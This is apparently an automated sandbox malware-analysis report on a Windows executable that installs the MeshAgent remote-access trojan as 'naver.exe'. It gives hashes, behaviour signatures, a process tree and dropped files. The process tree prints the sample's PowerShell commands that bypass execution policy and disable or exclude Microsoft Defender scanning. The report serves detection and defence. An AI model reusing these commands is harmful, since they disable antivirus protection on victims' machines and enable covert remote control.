Analysis

  • max time kernel
    124s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    24-09-2024 03:29

General

  • Target

    2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe

  • Size

    18.9MB

  • MD5

    4dfdae8af85639b2c395c7b10c6bf896

  • SHA1

    347bef6b6b30d1caf3af7e8709fefeec2a277071

  • SHA256

    b01fbd9f1842d5d983b203735b87bc646e3a332d6d975f6e4d05e11a346691bf

  • SHA512

    dcfd495f4012c051d5a5fdff7b77c8db65ef4036a6eb6d6ffe8e359f6625a4daea5dd4c851e3bc033b8eedcba09648592f02039d3ba11cd8a39f5f9a98272186

  • SSDEEP

    393216:g8g8THhdWnaqtvylAjWZ0Xq9YLuxMfCVb2z:Zg8mhtvylAjWZ0Xq9YLuxMfCVKz

Malware Config

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 64 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4304
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2064
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3660
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4044
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2532
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:3976
          • C:\Users\Admin\AppData\Local\naver\naver.exe
            C:\Users\Admin\AppData\Local\naver\naver.exe -install
            5⤵
            • Sets service image path in registry
            • Executes dropped EXE
            PID:5036
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3836,i,11391966286255097843,10588851088187498028,262144 --variations-seed-version --mojo-platform-channel-handle=4348 /prefetch:8
    1⤵
    PID:1392
    • C:\Users\Admin\AppData\Local\naver\naver.exe
      "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
      1⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:2192
      • C:\Windows\System32\wbem\wmic.exe
        wmic SystemEnclosure get ChassisTypes
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:692
      • C:\Windows\system32\wbem\wmic.exe
        wmic os get oslanguage /FORMAT:LIST
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:516
      • C:\Windows\System32\wbem\wmic.exe
        wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2216
      • C:\Windows\system32\wbem\wmic.exe
        wmic os get oslanguage /FORMAT:LIST
        2⤵
        PID:1652
      • C:\Windows\System32\wbem\wmic.exe
        wmic SystemEnclosure get ChassisTypes
        2⤵
        PID:4600
      • C:\Windows\System32\wbem\wmic.exe
        wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
        2⤵
        PID:1820
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -noprofile -nologo -command -
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        PID:2868

Network

MITRE ATT&CK Enterprise v15

Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            2f57fde6b33e89a63cf0dfdd6e60a351

            SHA1

            445bf1b07223a04f8a159581a3d37d630273010f

            SHA256

            3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

            SHA512

            42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

            Filesize

            53KB

            MD5

            a26df49623eff12a70a93f649776dab7

            SHA1

            efb53bd0df3ac34bd119adf8788127ad57e53803

            SHA256

            4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

            SHA512

            e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            e89c193840c8fb53fc3de104b1c4b092

            SHA1

            8b41b6a392780e48cc33e673cf4412080c42981e

            SHA256

            920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

            SHA512

            865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_21kxgm1v.tpz.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\naver\naver.exe

            Filesize

            5.3MB

            MD5

            c41e8324cb68c07c2bbff56d645cae53

            SHA1

            13518a95a782ea595aff1e7f15397d2968738718

            SHA256

            4f9f9cc3996b3f8ee33b46263ad726085ee4f06520012bcfb6a2df77ecdb7917

            SHA512

            7b2271be16d9729c32398b62299c5526dc6c9d98ef3213513554eb46f21917f50ab4b82b5e83ca83582c3b570e8a79713d2bf0779162d687aebbd3b47dd0900b

          • C:\Users\Admin\AppData\Local\naver\naver.msh

            Filesize

            22KB

            MD5

            2dd515ea546a81398d94dd15e3b4d55c

            SHA1

            eb0b0fca721a296906166b7e972559b87353b726

            SHA256

            becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2

            SHA512

            439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb

          • memory/2064-30-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/2064-16-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/2064-17-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/2064-15-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/3660-33-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/3660-31-0x00007FFEC0003000-0x00007FFEC0005000-memory.dmp

            Filesize

            8KB

          • memory/3660-32-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/3660-1-0x00007FFEC0003000-0x00007FFEC0005000-memory.dmp

            Filesize

            8KB

          • memory/3660-27-0x000001DAD2C90000-0x000001DAD2D06000-memory.dmp

            Filesize

            472KB

          • memory/3660-14-0x000001DAD2BC0000-0x000001DAD2C04000-memory.dmp

            Filesize

            272KB

          • memory/3660-13-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/3660-52-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/3660-12-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/3660-7-0x000001DAD2350000-0x000001DAD2372000-memory.dmp

            Filesize

            136KB